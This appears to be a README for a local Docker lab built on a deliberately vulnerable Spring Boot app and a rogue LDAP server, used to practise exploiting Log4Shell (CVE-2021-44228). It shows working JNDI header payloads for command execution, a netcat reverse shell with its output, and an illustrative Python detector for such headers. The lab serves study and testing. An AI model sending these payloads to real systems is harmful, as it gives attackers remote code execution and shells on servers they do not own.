Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

fopinappb/log4shell-vulnerable-app

 
 

Full playground setup for Log4Shell using this great app and documentation (their blog post) and this rogue LDAP server (codechina mirror, as it was removed from GitHub).

Both projects are copied into this repo, with the original README and LICENSE files kept under each.

Quickstart

  • Launch the lab
docker compose up
  • Send payload to `vulnapp`
curl 127.0.0.1:40000 -H 'X-Api-Version: ${jndi:ldap://ldap:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • Verify payload executed
docker compose exec vulnapp ls -l /tmp/pwned
-rw-r--r--    1 root     root             0 Dec 14 01:43 /tmp/pwned

Check the JNDIExploit README for more options (paths), such as a reverse shell:

  1. Install bash in vulnapp (does not work with alpine sh): docker compose exec vulnapp apk add bash
  2. Start netcat on the ldap container (but it can be anywhere): docker compose exec ldap nc -nvlp 7677
  3. Use the /ReverseShell path: curl 127.0.0.1:40000 -H 'X-Api-Version: ${jndi:ldap://ldap:1389/Basic/ReverseShell/ldap/7677}'
  4. Enjoy the shell
listening on [::]:7677 ...
connect to [::ffff:172.19.0.2]:7677 from [::ffff:172.19.0.3]:38094 ([::ffff:172.19.0.3]:38094)
bash-4.4#
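
Added example (not part of this repository or of the projects it bundles): a triage helper for reviewing request headers captured in the lab. It finds the plain `${jndi:...}` lookup form used in the requests above, extracts the callback scheme, host and port, and decodes the command when the path carries the `/Base64/` segment seen in the quickstart. The function names and the sample header set are constructed for illustration.

```python
import base64
import binascii
import re

# Plain ${jndi:scheme://host[:port]/path} lookup, as sent in the lab requests.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
B64_MARKER = "/Base64/"  # path segment used by the quickstart request


def decode_command(path):
    """Return the decoded command for a .../Base64/<data> path, else None."""
    if not path or B64_MARKER not in path:
        return None
    data = path.split(B64_MARKER, 1)[1]
    try:
        raw = base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None  # not valid Base64: leave for manual review
    return raw.decode("utf-8", "replace").strip()


def triage(headers):
    """Return one finding per JNDI lookup found in any header value."""
    findings = []
    for name, value in headers.items():
        for m in JNDI_RE.finditer(value):
            findings.append({
                "header": name,
                "scheme": m["scheme"].lower(),
                "host": m["host"],
                "port": int(m["port"]) if m["port"] else None,
                "command": decode_command(m["path"]),
            })
    return findings


# Constructed sample: the quickstart request's header plus a benign one.
SAMPLE = {
    "User-Agent": "curl/8.0",
    "X-Api-Version": "${jndi:ldap://ldap:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}",
}

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

The regular expression only covers the literal lookup form shown in this README, so a clean result is not proof that a header is harmless.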
